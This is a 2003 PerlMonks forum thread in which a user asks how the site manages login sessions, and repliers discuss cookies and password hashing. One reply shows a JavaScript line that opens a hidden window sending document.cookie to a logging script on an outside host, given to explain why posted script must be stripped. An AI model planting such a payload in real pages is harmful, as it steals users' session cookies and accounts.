http://www.perlmonks.org?node_id=225680

fellow monks,

out of interest, does anyone know how perlmonks.org does their session handling? i dont think they use cookies... at least i didnt see them drop any when i log in, but i may have missed it.

i cant help but wonder how they manager their sessions... and if this is forbidden knowledge, i appologize, for i mean no disrespect :)

thank you monks

Replies are listed 'Best First'.
Re: the perlmonks website sessions...
by BUU (Prior) on Jan 09, 2003 at 23:28 UTC
[reply]

      javascript must be automatically removed from posts... imagine this javascript code (unchecked): 

           openwindow("http://host.com/log.pl?cc="+document.cookie,"_blank",
+"width=0,height=0,toolbar=0,statusbar=0,menu=0");

      [download]
[reply]
[d/l]
[reply]

      Be careful with those, BTW -- IIRC, the hash on the password is reversable (given enough background data). It used to be even worse; the password used to be in plaintext, IIRC.)

      Warning: Unless otherwise stated, code is untested. Do not use without understanding. Code is posted in the hopes it is useful, but without warranty. All copyrights are relinquished into the public domain unless otherwise stated. I am not an angel. I am capable of error, and err on a fairly regular basis. If I made a mistake, please let me know (such as by replying to this node).

[reply]
        If you read the thread posted by IlyaM you'll see that it doesn't even need to be reversed to be used/exploited. Unless changes have been made since. :)
        You have moved into a dark place.
        It is pitch black. You are likely to be eaten by a grue.
[reply]

Back to Perl Monks Discussion